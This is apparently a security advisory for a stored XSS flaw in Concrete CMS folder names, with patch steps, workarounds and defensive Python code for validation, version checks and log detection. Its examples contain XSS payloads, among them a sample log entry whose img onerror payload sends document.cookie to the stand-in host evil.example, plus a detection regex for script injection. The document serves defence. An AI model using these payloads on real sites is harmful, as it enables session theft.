CVE-2025-0660

4.8 MEDIUM

📋 TL;DR

Concrete CMS versions 9.0.0 through 9.3.9 contain a stored cross-site scripting (XSS) vulnerability in the 'Add Folder' functionality. An attacker holding an administrator account (a rogue admin, or anyone who has compromised one) can supply JavaScript as a folder name; the payload is stored and executes in the browser of any other user who views the folder. Every Concrete CMS 9.x installation in the affected range is vulnerable, but exploitation requires admin-level access.

💻 Affected Systems

Products:
  • Concrete CMS
Versions: 9.0.0 through 9.3.9
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Versions below 9.x are not affected. Requires admin-level access to exploit.

📦 What is this software?

Concrete CMS is an open-source, PHP-based content management system used to build and manage websites. The vulnerable 'Add Folder' functionality is part of its administrative interface.

⚠️ Risk & Real-World Impact

🔴

Worst Case

A rogue administrator could steal session cookies, perform actions as other users, or redirect users to malicious sites through persistent XSS payloads in folder names.

🟠

Likely Case

Limited impact because exploitation requires admin privileges; the realistic use is by one admin (or an attacker with a stolen admin session) against other privileged users, for session hijacking or defacement within the CMS interface.

🟢

If Mitigated

With the patch applied, or with admin accounts tightly controlled and a restrictive Content Security Policy in place, impact is minimal because exploitation requires privileged access.

🌐 Internet-Facing: MEDIUM
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires admin privileges and knowledge of the vulnerability. No public exploit code identified.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 9.3.10

Vendor Advisory: https://documentation.concretecms.org/9-x/developers/introduction/version-history/940-release-notes

Restart Required: No

Instructions:

1. Back up your Concrete CMS installation and database.
2. Update to version 9.3.10 or later via the built-in updater or manual installation.
3. Verify that the update completed successfully.

🔧 Temporary Workarounds

Input Validation for Folder Names

Platform: all

Restrict folder names to a safe allowlist (for example letters, digits, spaces, dots, hyphens and underscores) before they are stored, and confirm that every view which displays folder names HTML-encodes them. Stored XSS is only fully closed by encoding at output; treat input validation as defense in depth rather than the fix, and remember that names stored before the workaround was in place still need to be reviewed.
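Both halves of that workaround, as an added example rather than Concrete CMS code: an allowlist check in front of storage, and a render path that HTML-encodes at output next to the unencoded one that produces the bug class. The allowlist policy, the `add_folder` handler and the `<li>` markup are assumptions for illustration only.

```python
import html
import re

# Assumed allowlist policy for this example (not Concrete CMS's own rule):
# letters, digits, space, dot, hyphen and underscore, 1 to 255 characters.
FOLDER_NAME_RE = re.compile(r"[A-Za-z0-9 ._-]{1,255}")


def validate_folder_name(name: str) -> bool:
    """Defense in depth: refuse names outside the allowlist before they are stored."""
    return FOLDER_NAME_RE.fullmatch(name) is not None


def render_folder_row_vulnerable(name: str) -> str:
    """The bug class: a stored name is dropped into HTML unencoded, so a name
    such as <script>...</script> becomes live markup for every viewer."""
    return f"<li class=\"folder\">{name}</li>"


def render_folder_row_fixed(name: str) -> str:
    """The real fix: HTML-encode at output. This neutralizes names that were
    stored before any input validation existed."""
    return f"<li class=\"folder\">{html.escape(name, quote=True)}</li>"


def add_folder(store: list, name: str) -> bool:
    """Hypothetical 'Add Folder' handler with validation in front of storage.
    Returns True if the name was accepted and stored."""
    if not validate_folder_name(name):
        return False
    store.append(name)
    return True


if __name__ == "__main__":
    payload = "<script>alert(document.cookie)</script>"   # constructed test payload
    folders = ["Q3 reports", payload]                      # one benign name, one stored payload
    for name in folders:
        print(render_folder_row_vulnerable(name))
        print(render_folder_row_fixed(name))
    print(add_folder([], payload))   # rejected before storage
```

The encoded renderer is the part that matters: even a payload that slipped past validation (or was stored before the workaround) is emitted as `&lt;script&gt;...` and never reaches the browser's HTML parser as a tag.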

Restrict Admin Privileges

Platform: all

Review administrator accounts and remove any that are not strictly needed. The flaw is only reachable with admin-level access, so every remaining admin account should have a strong, unique password and, where your deployment supports it, multi-factor authentication.

🧯 If You Can't Patch

  • Deploy a strict Content Security Policy: a script-src that does not allow 'unsafe-inline' and uses nonces or hashes for legitimate inline scripts, so an injected folder name cannot execute even where it is rendered unencoded. Roll it out in report-only mode against the admin interface first, since CMS dashboards often depend on inline scripts.
  • Monitor admin account activity and folder creation logs for suspicious behavior, including folder names containing angle brackets, event-handler attributes, or their URL-encoded or HTML-entity-encoded forms.

🔍 How to Verify

Check if Vulnerable:

Check Concrete CMS version in admin dashboard or via version file. If version is between 9.0.0 and 9.3.9 inclusive, system is vulnerable.

Check Version:

Check /concrete/config/concrete.php or admin dashboard for version number.

Verify Fix Applied:

After updating, verify the version is 9.3.10 or higher. Then, in a test instance, exercise the 'Add Folder' functionality with basic XSS payloads and confirm the folder name is displayed as literal, HTML-encoded text rather than interpreted as markup.
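A version check for the range above, as an added example (not a Concrete CMS tool). It compares versions as integer tuples, because a plain string comparison says "9.3.10" sorts before "9.3.9" and would report the patched release as vulnerable. The sample config text is constructed; the exact layout of the 'version' entry in concrete/config/concrete.php is an assumption, so confirm it against your own install before relying on the regex.

```python
import re
from pathlib import Path

# Constructed sample of the version entry. The real file is
# concrete/config/concrete.php; the 'version' => '...' layout is assumed.
SAMPLE_CONFIG = """<?php
return [
    'version' => '9.3.9',
    'version_installed' => '9.3.9',
];
"""

VERSION_RE = re.compile(r"'version'\s*=>\s*'(\d+(?:\.\d+)*)'")
FIRST_AFFECTED = (9, 0, 0)
FIRST_FIXED = (9, 3, 10)


def parse_version(config_text: str) -> tuple:
    """Extract the version as a tuple of ints (9.3.9 -> (9, 3, 9)).
    Tuples compare numerically; strings would put '9.3.10' before '9.3.9'."""
    m = VERSION_RE.search(config_text)
    if not m:
        raise ValueError("no 'version' entry found")
    return tuple(int(part) for part in m.group(1).split("."))


def is_vulnerable(version: tuple) -> bool:
    """True for 9.0.0 <= version < 9.3.10, the advisory's affected range."""
    padded = (tuple(version) + (0, 0, 0))[:3]   # so 9.3 compares like 9.3.0
    return FIRST_AFFECTED <= padded < FIRST_FIXED


def check_config(config_text: str) -> tuple:
    """Return (version string, vulnerable?) for the given config contents."""
    version = parse_version(config_text)
    return ".".join(str(p) for p in version), is_vulnerable(version)


def check_install(web_root: str) -> tuple:
    """Read the version file under a Concrete CMS web root and check it."""
    config_path = Path(web_root, "concrete", "config", "concrete.php")
    return check_config(config_path.read_text())


if __name__ == "__main__":
    print(check_config(SAMPLE_CONFIG))   # ('9.3.9', True)
```

Run `check_install("/var/www/html")` (or wherever the site lives) against a real install; if the regex finds nothing, open the file and adjust `VERSION_RE` to the layout you see rather than trusting a silent miss.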

📡 Detection & Monitoring

Log Indicators:

  • Unusual folder creation events by admin users
  • Folder names containing JavaScript or HTML tags in logs

Network Indicators:

  • Unexpected script execution in the CMS interface (reported by users, or surfaced as CSP violation reports if a policy is deployed)
  • Requests from users' browsers to unfamiliar external domains while viewing folder pages, a sign of cookie or token exfiltration

SIEM Query:

Search folder-creation events for folder-name values containing payload-like strings ('<', 'script', 'on...=' event handlers, 'javascript:') and their URL-encoded or HTML-entity-encoded equivalents, since a payload that was encoded on the way in will not match a naive search for '<script>'.
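That search, as an added detection example run over constructed sample log lines (not real Concrete CMS log output; the JSON field names `ts`, `user`, `event` and `name` are assumptions, so map them to whatever your application or web server logs emit). It decodes URL and HTML-entity encoding before matching, which is what catches the encoded variants a plain substring search misses.

```python
import html
import json
import re
from urllib.parse import unquote

# Constructed sample log lines (not real Concrete CMS output). Field names
# are assumed; the evil.example domain is a placeholder.
SAMPLE_LOGS = [
    '{"ts":"2025-01-20T10:01:02Z","user":"alice","event":"folder.create","name":"Q3 reports"}',
    '{"ts":"2025-01-20T10:05:44Z","user":"mallory","event":"folder.create",'
    '"name":"<img src=x onerror=fetch(\'https://evil.example/?c=\'+document.cookie)>"}',
    '{"ts":"2025-01-20T10:06:10Z","user":"mallory","event":"folder.create",'
    '"name":"%3Cscript%3Ealert(1)%3C%2Fscript%3E"}',
    '{"ts":"2025-01-20T10:07:00Z","user":"bob","event":"folder.rename","name":"Photos &amp; Video"}',
    '{"ts":"2025-01-20T10:08:30Z","user":"mallory","event":"folder.create",'
    '"name":"&lt;svg onload=alert(1)&gt;"}',
    'not json at all',
]

# Markers that have no business in a folder name: a tag opener, an inline
# event handler, or a javascript: URL. Tune for your environment.
PAYLOAD_RE = re.compile(
    r"<\s*/?\s*[a-z]"        # <img, <script, </script, <svg ...
    r"|\bon[a-z]+\s*="       # onerror=, onload= (word boundary avoids 'Conversion=')
    r"|javascript\s*:",      # javascript: URLs
    re.IGNORECASE,
)


def normalize(value: str) -> str:
    """Undo URL and HTML-entity encoding, repeating to catch double encoding,
    so '%3Cscript%3E' and '&lt;script&gt;' both become '<script>'."""
    for _ in range(3):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_folder_events(lines):
    """Return (ts, user, event, decoded name) for folder events whose name
    looks like markup or script after decoding."""
    hits = []
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue                        # skip malformed lines
        if not str(rec.get("event", "")).startswith("folder."):
            continue
        name = normalize(str(rec.get("name", "")))
        if PAYLOAD_RE.search(name):
            hits.append((rec.get("ts"), rec.get("user"), rec["event"], name))
    return hits


if __name__ == "__main__":
    for hit in suspicious_folder_events(SAMPLE_LOGS):
        print(hit)
```

The benign rename "Photos &amp; Video" decodes to an ampersand and is not flagged, while the URL-encoded and entity-encoded payloads decode to tags and are; that asymmetry is the reason to normalize before matching rather than searching raw log text.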
